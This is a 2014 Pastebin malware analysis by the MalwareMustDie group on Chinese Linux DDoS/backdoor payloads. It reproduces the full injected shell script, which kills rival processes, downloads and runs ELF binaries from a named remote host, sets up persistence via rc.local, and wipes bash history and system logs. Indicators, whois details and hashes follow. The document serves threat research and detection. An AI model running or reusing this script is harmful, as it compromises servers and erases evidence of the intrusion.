API tools faq
paste
Advertisement
MalwareMustDie

Multiple China DDoS-er/backdoor payloads w/long shell cmd

MalwareMustDie
Oct 14th, 2014
5,407
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 16.06 KB | None | 0 0
raw download clone embed print report
  1. // #MalwareMustDie!! Tue Oct 14 21:37:28 JST 2014
  2. // Multiple China DDoS-er/backdoor payloads was reported in action infecting victim using
  3. // one-liner long shell command
  4. // Initial case: http://blog.malwaremustdie.org/2014/05/linux-reversing-is-fun-toying-with-elf.html
  5. // Follow up report: http://blog.malwaremustdie.org/2014/05/linux-reversing-is-fun-toying-with-elf.html?showComment=1413220693224#c4466937356030505144
  6. // Payloads are: China ELF DDoS-er malware multiple type:
  7.    (1) Linux/IptabLes|x , (2) Linux/BillGates & (3) Linux/Elknot (packed & unpacked)
  8.  
  9. // One line injected command:
  10.  
  11. "/etc/init.d/iptables stop
  12.        echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  13.        echo "nameserver 8.8.4.4" >> /etc/resolv.conf
  14.        apt-get -y install wget
  15.        yum -y install wget
  16.        chmod 7777 / etc
  17.        killall -9 .IptabLes
  18.        killall -9 nfsd4
  19.        killall -9 profild.key
  20.        cd /etc;rm -rf dir fake.cfg
  21.        killall -9 nfsd
  22.        killall -9 DDosl
  23.        killall -9 lengchao32
  24.        killall -9 b26
  25.        killall -9 khelper
  26.        killall -9 Bill
  27.        killall -9 n26
  28.        killall -9 007
  29.        killall -9 codelove
  30.        killall -9 32
  31.        killall -9 m32
  32.        killall -9 m64
  33.        killall -9 64
  34.        killall -9 83BOT
  35.        killall -9 82BOT
  36.        killall -9 dos64
  37.        killall -9 dos32
  38.        killall -9 new6
  39.        killall -9 new4
  40.        killall -9 node24
  41.        killall -9 mimi
  42.        killall -9 nodeJR-1
  43.        killall -9 freeBSD
  44.        killall -9 ksapdd
  45.        killall -9 106
  46.        killall -9 09
  47.        killall -9 xsw
  48.        killall -9 syslogd
  49.        killall -9 skysapdd
  50.        killall -9 cupsddd
  51.        killall -9 ksapd
  52.        killall -9 atddd
  53.        killall -9 xfsdxd
  54.        killall -9 sfewfesfs
  55.        killall -9 gfhjrtfyhuf
  56.        killall -9 rewgtf3er4t
  57.        killall -9 fdsfsfvff
  58.        killall -9 smarvtd
  59.        killall -9 whitptabil
  60.        killall -9 gdmorpen
  61.        cd /etc;chattr -i 66
  62.        cd /root; chmod 7777 / etc
  63.        killall -9 minerd
  64.        killall -9 syn
  65.        killall -9 joudckfr
  66.        killall -9 www
  67.        killall -9 log
  68.        killall -9 .IptabLes
  69.        killall -9 .IptabLex
  70.        killall -9 .Mm2
  71.        killall -9 acpid
  72.        killall -9 m64
  73.        killall -9 ./QQ
  74.        killall -9 aabb
  75.        killall -9 g3
  76.        killall -9 S99local
  77.        killall -9 3
  78.        killall -9 pm
  79.        killall -9 qweasd
  80.        killall -9 tangtang
  81.        killall -9 imap-login
  82.        killall -9 xudp
  83.        killall -9 sshpa
  84.        killall -9 008
  85.        killall -9 txma
  86.        killall -9 mrdos64.b00
  87.        killall -9 mrdos32.b00
  88.        killall -9 kkpklp
  89.        killall -9 kiilp
  90.        killall -9 xin1
  91.        killall -9 jibateng
  92.        killall -9 syscore.sh
  93.        killall -9 syscore.sh
  94.        killall -9 syscore.sh
  95.        killall -9 .mimeo
  96.        killall -9 .mimeo
  97.        killall -9 .mimeo
  98.        killall -9 .mimeop
  99.        killall -9 .task1
  100.        killall -9 .mimeop
  101.        killall -9 .IptabLes
  102.        killall -9 .IptabLex
  103.        killall -9 .IptabLes
  104.        killall -9 .IptabLex
  105.        killall -9 .IptabLes
  106.        killall -9 .IptabLex
  107.        killall -9 .IptabLes
  108.        killall -9 .IptabLex
  109.        cd /root;rm -rf dir nohup.out
  110.        cd /etc;rm -rf dir fake.cfg
  111.        cd /etc;rm -rf dir cupsddd.*
  112.        cd /etc;rm -rf dir atddd.*
  113.        cd /etc;rm -rf dir ksapdd.*
  114.        cd /etc;rm -rf dir kysapdd.*
  115.        cd /etc;rm -rf dir sksapdd.*
  116.        cd /etc;rm -rf dir skysapdd.*
  117.        cd /etc;rm -rf dir xfsdxd.*
  118.        cd /etc;rm -rf dir fake.cfg
  119.        cd /etc;rm -rf dir cupsdd.*
  120.        cd /etc;rm -rf dir atdd.*
  121.        cd /etc;rm -rf dir ksapd.*
  122.        cd /etc;rm -rf dir kysapd.*
  123.        cd /etc;rm -rf dir sksapd.*
  124.        cd /etc;rm -rf dir skysapd.*
  125.        cd /etc;rm -rf dir xfsdx.*
  126.        cd /etc;rm -rf dir sfewfesfs
  127.        cd /etc;rm -rf dir gfhjrtfyhuf
  128.        cd /etc;rm -rf dir rewgtf3er4t
  129.        cd /etc;rm -rf dir fdsfsfvff
  130.        cd /etc;rm -rf dir smarvtd
  131.        cd /etc;rm -rf dir whitptabil
  132.        cd /etc;rm -rf dir gdmorpen
  133.        cd /etc;rm -rf dir sfewfesfs.*
  134.        cd /etc;rm -rf dir gfhjrtfyhuf.*
  135.        cd /etc;rm -rf dir rewgtf3er4t.*
  136.        cd /etc;rm -rf dir fdsfsfvff.*
  137.        cd /etc;rm -rf dir smarvtd.*
  138.        cd /etc;rm -rf dir whitptabil.*
  139.        cd /etc;rm -rf dir gdmorpen.*
  140.        cd /etc;rm -rf dir nhgbhhj.*
  141.        cd /tmp;rm -rf dir 1.*
  142.        cd /tmp;rm -rf dir 2.*
  143.        cd /tmp;rm -rf dir 3.*
  144.        cd /tmp;rm -rf dir 4.*
  145.        cd /tmp;rm -rf dir 5.*
  146.        cd /tmp;rm -rf dir jdhe
  147.        cd /tmp;rm -rf dir jdhe.*
  148.        cd /var/spool/cron; rm -rf dir root.*
  149.        cd /var/spool/cron; rm -rf dir root
  150.        cd /var/spool/cron/crontabs; rm -rf dir root.*
  151.        cd /var/spool/cron/crontabs; rm -rf dir root
  152.        cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
  153.        cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
  154.        yes|mv /tmp/root /var/spool/cron
  155.        yes|mv /tmp/root /var/spool/cron/crontabs
  156.        cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
  157.        cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
  158.        cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
  159.        cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
  160.        cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
  161.        cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
  162.        cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
  163.        cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
  164.        cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj
  165.        cd /etc;wget -c http://www.frade8c.com:9162/byv832
  166.        cd /tmp;chmod 7777 jdhe
  167.        cd /etc;chmod 7777 nhgbhhj
  168.        cd /etc;chmod 7777 byv832
  169.        cd /etc;chmod 7777 sfewfesfs
  170.        cd /etc;chmod 7777 gfhjrtfyhuf
  171.        cd /etc;chmod 7777 rewgtf3er4t
  172.        cd /etc;chmod 7777 fdsfsfvff
  173.        cd /etc;chmod 7777 smarvtd
  174.        cd /etc;chmod 7777 whitptabil
  175.        cd /etc;chmod 7777 gdmorpen
  176.        cd /tmp;chmod 7777 nhgbhhj
  177.        cd /tmp;chmod 7777 byv832
  178.        cd /tmp;chmod 7777 sfewfesfs
  179.        cd /tmp;chmod 7777 gfhjrtfyhuf
  180.        cd /tmp;chmod 7777 rewgtf3er4t
  181.        cd /tmp;chmod 7777 fdsfsfvff
  182.        cd /tmp;chmod 7777 smarvtd
  183.        cd /tmp;chmod 7777 whitptabil
  184.        cd /tmp;chmod 7777 gdmorpen
  185.        cd /tmp;./jdhe
  186.        nohup /etc/sfewfesfs > /dev/null 2>&1&
  187.        nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
  188.        nohup /etc/rewgtf3er4t > /dev/null 2>&1&
  189.        nohup /etc/fdsfsfvff > /dev/null 2>&1&
  190.        nohup /etc/smarvtd > /dev/null 2>&1&
  191.        nohup /etc/whitptabil > /dev/null 2>&1&
  192.        nohup /etc/gdmorpen > /dev/null 2>&1&
  193.        nohup /etc/nhgbhhj > /dev/null 2>&1&
  194.        nohup /etc/byv832 > /dev/null 2>&1&
  195.        nohup /tmp/sfewfesfs > /dev/null 2>&1&
  196.        nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&
  197.        nohup /tmp/rewgtf3er4t > /dev/null 2>&1&
  198.        nohup /tmp/fdsfsfvff > /dev/null 2>&1&
  199.        nohup /tmp/smarvtd > /dev/null 2>&1&
  200.        nohup /tmp/whitptabil > /dev/null 2>&1&
  201.        nohup /tmp/gdmorpen > /dev/null 2>&1&
  202.        nohup /tmp/nhgbhhj > /dev/null 2>&1&
  203.        nohup /tmp/byv832 > /dev/null 2>&1&
  204.        echo "cd /tmp;./sfewfesfs" >> /etc/rc.local
  205.        echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local
  206.        echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local
  207.        echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local
  208.        echo "cd /tmp;./smarvtd" >> /etc/rc.local
  209.        echo "cd /tmp;./whitptabil" >> /etc/rc.local
  210.        echo "cd /tmp;./gdmorpen" >> /etc/rc.local
  211.        echo "cd /etc;./sfewfesfs" >> /etc/rc.local
  212.        echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local
  213.        echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local
  214.        echo "cd /etc;./fdsfsfvff" >> /etc/rc.local
  215.        echo "cd /etc;./smarvtd" >> /etc/rc.local
  216.        echo "cd /etc;./whitptabil" >> /etc/rc.local
  217.        echo "cd /etc;./gdmorpen" >> /etc/rc.local
  218.        echo "unset MAILCHECK" >> /etc/profile
  219.        cd /etc;chattr +i sfewfesfs
  220.        rm -rf /root/.bash_history
  221.        touch /root/.bash_history
  222.        history -r
  223.        cd /var/log > dmesg
  224.        cd /var/log > auth.log
  225.        cd /var/log > alternatives.log
  226.        cd /var/log > boot.log
  227.        cd /var/log > btmp
  228.        cd /var/log > cron
  229.        cd /var/log > cups
  230.        cd /var/log > daemon.log
  231.        cd /var/log > dpkg.log
  232.        cd /var/log > faillog
  233.        cd /var/log > kern.log
  234.        cd /var/log > lastlog
  235.        cd /var/log > maillog
  236.        cd /var/log > user.log
  237.        cd /var/log > Xorg.x.log
  238.        cd /var/log > anaconda.log
  239.        cd /var/log > yum.log
  240.        cd /var/log > secure
  241.        cd /var/log > wtmp
  242.        cd /var/log > utmp
  243.        cd /var/log > messages
  244.        cd /var/log > spooler
  245.        cd /var/log > sudolog
  246.        cd /var/log > aculog
  247.        cd /var/log > access-log
  248.        cd /root > .bash_history
  249.        history -c"
  250.  
  251.  
  252. // Payload URLS:
  253.  
  254. h00p://www.frade8c.com:9162/root (crontab script garbage)
  255.  
  256. h00p://www.frade8c.com:9162/jdhe
  257. h00p://www.frade8c.com:9162/sfewfesfs
  258. h00p://www.frade8c.com:9162/gfhjrtfyhuf
  259. h00p://www.frade8c.com:9162/rewgtf3er4t
  260. h00p://www.frade8c.com:9162/fdsfsfvff
  261. h00p://www.frade8c.com:9162/smarvtd
  262. h00p://www.frade8c.com:9162/whitptabil
  263. h00p://www.frade8c.com:9162/gdmorpen
  264. h00p://www.frade8c.com:9162/nhgbhhj
  265. h00p://www.frade8c.com:9162/byv832
  266.  
  267. // Source analyzed:
  268.  
  269.  
  270. Date: 2014-10-14 19:57:50
  271. Resolving www.frade8c.com (www.frade8c.com)... 219.135.56.211
  272. Caching www.frade8c.com => 219.135.56.211
  273. Connecting to www.frade8c.com (www.frade8c.com)|219.135.56.211|:9162... connected.
  274. Host: www.frade8c.com:9162
  275. Connection: Keep-Alive
  276. HTTP request sent, awaiting response...
  277.  
  278. ---response---
  279. HTTP/1.1 200 OK
  280. Server: nginx/1.6.2
  281. Date: Tue, 14 Oct 2014 18:58:37 GMT
  282. Content-Type: application/octet-stream
  283. Content-Length: 1554782
  284. Last-Modified: Sun, 24 Aug 2014 18:29:06 GMT
  285. Connection: keep-alive
  286. ETag: "53fa2ef2-17b95e"
  287. Accept-Ranges: bytes
  288. 200 OK
  289. Registered socket 4 for persistent reuse.
  290. Length: 1554782 (1.5M) [application/octet-stream]
  291.  
  292. // Server Location: CHINA
  293. 219.135.56.211|211.56.135.219.broad.fs.gd.dynamic.163data.com.cn.|4134 | 219.128.0.0/13 | CHINANET | CN | CHINATELECOM.COM.CN | CHINANET GUANGDONG PROVINCE NETWORK
  294.  
  295. // Domain Registration; CHINA
  296.  
  297.    Domain Name: FRADE8C.COM
  298.    Registrar: GODADDY.COM, LLC
  299.    Whois Server: whois.godaddy.com
  300.    Referral URL: http://registrar.godaddy.com
  301.    Name Server: FREE.QYCN.CN
  302.    Name Server: FREE.QYCN.COM
  303.    Name Server: FREE.QYCN.NET
  304.    Name Server: FREE.QYCN.ORG
  305.    Status: clientDeleteProhibited
  306.    Status: clientRenewProhibited
  307.    Status: clientTransferProhibited
  308.    Status: clientUpdateProhibited
  309.    Updated Date: 10-sep-2014
  310.    Creation Date: 12-may-2014
  311.    Expiration Date: 12-may-2015
  312. >>> Last update of whois database: Tue, 14 Oct 2014 11:48:23 GMT <<<
  313.  
  314. Domain Name: FRADE8C.COM
  315. Registry Domain ID: 1858356025_DOMAIN_COM-VRSN
  316. Registrar WHOIS Server: whois.godaddy.com
  317. Registrar URL: http://www.godaddy.com
  318. Update Date: 2014-05-12 12:05:14
  319. Creation Date: 2014-05-12 11:43:36
  320. Registrar Registration Expiration Date: 2015-05-12 11:43:36
  321. Registrar: GoDaddy.com, LLC
  322. Registrar IANA ID: 146
  323. Registrar Abuse Contact Email: abuse@godaddy.com
  324. Registrar Abuse Contact Phone: +1.480-624-2505
  325. Domain Status: clientTransferProhibited
  326. Domain Status: clientUpdateProhibited
  327. Domain Status: clientRenewProhibited
  328. Domain Status: clientDeleteProhibited
  329. Registry Registrant ID:
  330. Registrant Name: xiao buyu
  331. Registrant Organization:
  332. Registrant Street: shanghaishirenminluyihao
  333. Registrant City: shanghai
  334. Registrant State/Province: shanghai
  335. Registrant Postal Code: 200000
  336. Registrant Country: China
  337. Registrant Phone: +0.862185966589
  338. Registrant Phone Ext:
  339. Registrant Fax:
  340. Registrant Fax Ext:
  341. Registrant Email: zhucegodaddy@126.com
  342. Registry Admin ID:
  343. Last update of WHOIS database: 2014-10-14T11:00:00Z
  344.  
  345.  
  346. // PAYLOAD ANALYSIS RESULT:
  347.  
  348. $ #MalwareMustDie!
  349. $ # Just finished categorized & analized these Chinese Ddoser mess:
  350. $
  351. $ date
  352. Tue Oct 14 20:39:16 JST 2014
  353. $
  354. $ file *
  355. byv832.IptabLes.mmd:           ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
  356. fdsfsfvff.IptabLes.x32.mmd:    ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
  357. gdmorpen.IptabLes.mmd:         ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
  358. gfhjrtfyhuf-unpack.Elknot.mmd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
  359. gfhjrtfyhuf.packed.Elknot.mmd: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
  360. jdhe.BillGates.mmd:            ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, for FreeBSD 8.4, not stripped
  361. nhgbhhj.BillGates.mmd:         ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
  362. rewgtf3er4t.IptabLes.x64.mmd:  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
  363. sfewfesfs.BillGates.mmd:       ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
  364. smarvtd-packed.Elknot.mmd:     ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
  365. smarvtd-unpack.Elknot.mmd:     ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
  366. whitptabil-unpack.Elknot.mmd:  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
  367. whitptabil.pack.Elknot.mmd:    ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
  368. $ md5 *
  369. MD5 (byv832.IptabLes.mmd) =           f7556d9ede5d988400b1edbb1a172634
  370. MD5 (fdsfsfvff.IptabLes.x32.mmd) =    048016c6e6848f92a29296b72df4d2d8
  371. MD5 (gdmorpen.IptabLes.mmd) =         e029dd6a6570c70a2b12301db8b508d1 = smarvtd-packed.Elknot.mmd = whitptabil.pack.Elknot.mmd
  372. MD5 (gfhjrtfyhuf.packed.Elknot.mmd) = 9941a4dc930868a5739a8004de53a686
  373. MD5 (gfhjrtfyhuf-unpack.Elknot.mmd) = 4f446e593dd83a24199ec2e7a84ac86a
  374. MD5 (jdhe.BillGates.mmd) =            7f3445e754493e76e09713cbc6415308
  375. MD5 (nhgbhhj.BillGates.mmd) =         8a9b27ee8ff7475ef535217583e02d8f
  376. MD5 (rewgtf3er4t.IptabLes.x64.mmd) =  18bcb1c192df95a4216946f0294135bf
  377. MD5 (sfewfesfs.BillGates.mmd) =       8285f35183f0341b8dfe425b7348411d
  378. MD5 (smarvtd-unpack.Elknot.mmd) =     fe060c05813fe155273f5b87bb59f960 = whitptabil-unpack.Elknot.mmd
  379.  
  380.  
  381.  
  382. https://www.virustotal.com/en/file/b0329f31923b7c39ddd1f345d12add01fdfeee6000ee03657163f87c7a09a527/analysis/1413287761/
  383. https://www.virustotal.com/en/file/ec4645d8306648a713e2b22849e72ff6eeb3931a83cee352fd105448577e6220/analysis/1413287839/
  384. https://www.virustotal.com/en/file/8f929aa1171de80191788fd78f56173de72048d15914f814f5271f00e6882324/analysis/1413287924/
  385. https://www.virustotal.com/en/file/5dbd1150f20fe8cd84f03484b661b5e822ff43a7e51d6c1d44c426f21cab225b/analysis/1413287986/
  386. https://www.virustotal.com/en/file/90f268827ea8f2543d38d1cb90a2f56da506e2152164984c8eb59b3043b485fc/analysis/1413288124/
  387. https://www.virustotal.com/en/file/e2895e8a671aa0c72ebaf7deabcef0b319b4952145f177749f6caef6293ac637/analysis/1413288173/
  388. https://www.virustotal.com/en/file/60cf05e05231cac5a0f0361f7626785db475f6b8f33bd8c3aaf948c0e1118ad3/analysis/1413288297/
  389. https://www.virustotal.com/en/file/f759be8115df769d493ecad3fb2cac09b36aba098f273c22d39364bd23f3138c/analysis/1413288354/
  390. https://www.virustotal.com/en/file/551b48e425dcf4337ee023ad65a871123d172e43fabbc965252f5a2e69d0bd4a/analysis/1413288439/
  391. https://www.virustotal.com/en/file/8f929aa1171de80191788fd78f56173de72048d15914f814f5271f00e6882324/analysis/1413288528/
  392. https://www.virustotal.com/en/file/3c45adc937187d90b6a350a51d2ff0d285d5609af8872433437761406262aefb/analysis/1413288612/
  393.  
  394. #------
  395. #Your report will be followed properly
  396. #MalwareMustDie!!!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!